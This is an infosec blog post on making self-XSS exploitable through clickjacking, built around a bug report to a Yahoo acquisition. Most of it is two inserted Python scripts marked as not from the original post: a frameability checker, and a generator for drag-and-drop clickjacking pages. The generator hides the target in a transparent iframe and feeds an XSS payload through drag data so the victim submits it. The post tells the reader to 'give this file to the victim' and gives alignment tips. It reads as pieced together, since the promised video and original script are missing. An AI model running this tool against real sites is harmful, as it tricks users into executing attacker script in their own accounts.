Vishwaraj Bhattrai

just another infosec enthusiast

Exploiting unexploitable/self XSS

There are multiple endpoints where we can get XSS in web apps, but most of the time they are self-XSS 😛 which requires user interaction to trigger. To make it exploitable, or at least to build a PoC, we are typically left with two options :p

  1. Using Clickjacking
  2. Using CSRF

Depending on which of the two conditions is present, we can build the PoC.

Here I will discuss a real example from one of the Yahoo acquisitions, Polyvore, which I reported.

There were multiple fields vulnerable to XSS. They were self-XSS, but the page could be framed (it had no clickjacking protection), so we can exploit them by getting the user to drop a filter-bypassing XSS vector into the vulnerable fields, tricking them into playing a drag-and-drop game.

That is at least better than a standalone self-XSS PoC, and it will get the point across to the team :v
I will write a separate post on how to do it via CSRF (nothing fancy involved there either), but clickjacking involves a little configuration, so this is just a bookmark post in case you run into such a situation.
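Before building the clickjacking PoC at all, confirm that the target page can actually be framed from an origin you control. The check below is an added example, not code from the original post: it decides frameability from the response headers alone, giving the CSP `frame-ancestors` directive precedence over `X-Frame-Options` (as browsers that support CSP do). The header sets, the target URL `https://target.test/settings` and the attacker origin are all constructed for illustration.

```python
"""Decide whether a response can be framed from an attacker-controlled origin.

Added example (not from the original post). The headers and URLs below are
constructed for illustration. Logic: if the response carries a CSP
frame-ancestors directive, that decides; otherwise X-Frame-Options decides;
with neither present the page is frameable from anywhere.
"""
from urllib.parse import urlsplit


def _origin(url):
    """Lower-cased scheme://host[:port] of a URL."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def _source_matches(source, attacker_origin, target_origin):
    """Match one frame-ancestors source expression against the attacker origin."""
    source = source.lower()
    if source == "'none'":
        return False
    if source == "'self'":
        return attacker_origin == target_origin
    if source == "*":
        return True
    a = urlsplit(attacker_origin)
    if source.endswith(":") and "/" not in source:      # scheme-only source, e.g. https:
        return a.scheme == source[:-1]
    s = urlsplit(source if "://" in source else "//" + source)
    if s.scheme and s.scheme != a.scheme:
        return False
    host = s.hostname or ""
    if host.startswith("*."):                          # *.example.com matches subdomains only
        if not a.hostname.endswith(host[1:]):
            return False
    elif host != a.hostname:
        return False
    default_port = 443 if a.scheme == "https" else 80
    if s.port and s.port != (a.port or default_port):
        return False
    return True


def is_frameable(headers, target_url, attacker_url):
    """True if a page at target_url served with these response headers can be
    embedded in a frame hosted on attacker_url. Only the enforced CSP header
    is consulted (Report-Only never blocks anything)."""
    target_origin = _origin(target_url)
    attacker_origin = _origin(attacker_url)
    lower = {k.lower(): v for k, v in headers.items()}

    csp = lower.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = parts[1:] or ["'none'"]          # an empty list means no ancestors
            return any(_source_matches(s, attacker_origin, target_origin) for s in sources)

    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return attacker_origin == target_origin
    if xfo.startswith("ALLOW-FROM"):                   # legacy; only old IE/Firefox honoured it
        allowed = xfo.split(None, 1)[1].strip() if " " in xfo else ""
        return bool(allowed) and _origin(allowed) == attacker_origin
    return True                                         # no framing restriction at all


if __name__ == "__main__":
    # Constructed sample responses; none of these came from a real target.
    samples = {
        "no headers": {},
        "deny": {"X-Frame-Options": "DENY"},
        "csp none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
        "csp partner": {"Content-Security-Policy": "frame-ancestors 'self' https://*.partner.test"},
        "conflicting": {"X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors *"},
    }
    for name, hdrs in samples.items():
        ok = is_frameable(hdrs, "https://target.test/settings", "https://attacker.test")
        print(f"{name:12s} frameable from attacker.test: {ok}")
```

Run it against the headers you captured from the real target (a `curl -I` of the vulnerable page is enough). A page that is frameable here can still defeat the drag-and-drop trick in practice: current browsers restrict dropping text into cross-origin frames, so always confirm the PoC in the same browser the victim would use.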

So I have written a custom .py script which generates a clickjacking-to-XSS PoC. On running the script, it will ask you for two things:

  1. The XSS vector that bypasses the filter
  2. Custom clickjacking code, which you can create from here

Q.) Why custom clickjacking code?

Because there are specific text fields and textareas which are vulnerable and need to be included as part of the game! You will understand it better from the video below.

Now you can give this file to the victim!
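To show what such a generator has to produce, here is an added example in the spirit of that script; it is not the script from the original post and not Polyvore's page. It assumes a fictional target `https://target.test/settings` whose vulnerable text field and submit button sit at known pixel coordinates (you measure those on the real page). The generated HTML loads the target in a transparent iframe stacked above a decoy "game", so the victim's drop lands in the real field and their "score" click hits the real submit button. The one subtle part is embedding the XSS vector in the page's own script without letting it break out of the `<script>` block, which is why the payload is JSON-encoded and `</` is escaped.

```python
"""Build a drag-and-drop clickjacking page that delivers a self-XSS payload.

Added example, not the .py script from the original post. The target URL,
the field coordinates and the payload used below are constructed for
illustration; every coordinate has to be measured against the real page.
"""
import html
import json

# Height of the strip at the top of the decoy page where the draggable
# "piece" lives; the framed target starts below it so the piece is never
# covered by the (transparent) iframe.
TOOLBAR_HEIGHT = 100


def js_string(value):
    """Encode a Python string as a JavaScript string literal that is safe
    inside <script>. json.dumps leaves "</" alone, which would let a payload
    such as </script>... terminate the script block early, so escape it."""
    return json.dumps(value).replace("</", "<\\/")


def build_dragdrop_poc(target_url, xss_vector, field_left, field_top,
                       submit_left, submit_top, frame_width=1200, frame_height=900):
    """Return a self-contained HTML page.

    Layout (coordinates in CSS px, measured on the framed target page):
      * the target is loaded in an iframe with opacity 0 and the highest
        z-index, so drops and clicks reach the real form, not the decoys;
      * a decoy "drop here" box is drawn under the vulnerable text field and
        a decoy "score" button under the form's submit button;
      * the draggable piece carries xss_vector as text/plain drag data, so a
        drop into the field is the same as the victim typing it.
    """
    frame_src = html.escape(target_url, quote=True)
    payload_js = js_string(xss_vector)
    box_top = field_top + TOOLBAR_HEIGHT
    score_top = submit_top + TOOLBAR_HEIGHT
    return f"""<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Drag the piece into the box</title>
<style>
  body   {{ margin: 0; font-family: sans-serif; }}
  #piece {{ position: absolute; left: 20px; top: 10px; width: 80px; height: 80px;
            background: #e33; border-radius: 40px; cursor: grab; z-index: 1; }}
  #box   {{ position: absolute; left: {field_left}px; top: {box_top}px;
            width: 220px; height: 40px; border: 3px dashed #333; z-index: 1; }}
  #score {{ position: absolute; left: {submit_left}px; top: {score_top}px;
            padding: 10px 20px; background: #3a3; color: #fff; z-index: 1; }}
  #frame {{ position: absolute; left: 0; top: {TOOLBAR_HEIGHT}px;
            width: {frame_width}px; height: {frame_height}px; border: 0;
            opacity: 0; z-index: 2; }}
</style>
</head>
<body>
<div id="piece" draggable="true">drag me</div>
<div id="box">drop here</div>
<div id="score">then click to score</div>
<iframe id="frame" src="{frame_src}"></iframe>
<script>
  // The payload is attached at dragstart; the drop lands in the framed
  // page's text field, which sits directly above #box.
  var payload = {payload_js};
  document.getElementById('piece').addEventListener('dragstart', function (e) {{
    e.dataTransfer.setData('text/plain', payload);
  }});
</script>
</body>
</html>
"""


if __name__ == "__main__":
    # Constructed demo input: a fictional settings page with a display-name
    # field at (300, 400) and its save button at (300, 460).
    page = build_dragdrop_poc("https://target.test/settings",
                              "</script><svg onload=alert(1)>",
                              300, 400, 300, 460)
    with open("poc.html", "w", encoding="utf-8") as fh:
        fh.write(page)
```

Set the iframe opacity to something like 0.3 while you align the decoys, then back to 0 before sending it. If the field already contains text, or the target re-escapes dropped input differently from typed input, the drop will not reproduce the self-XSS, so test the generated file end to end against the real page before reporting.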

PoC in action:

Script:

Greetz to #kotowicz for his great work in the clickjacking domain.

That’s all guys 🙂

$ logout
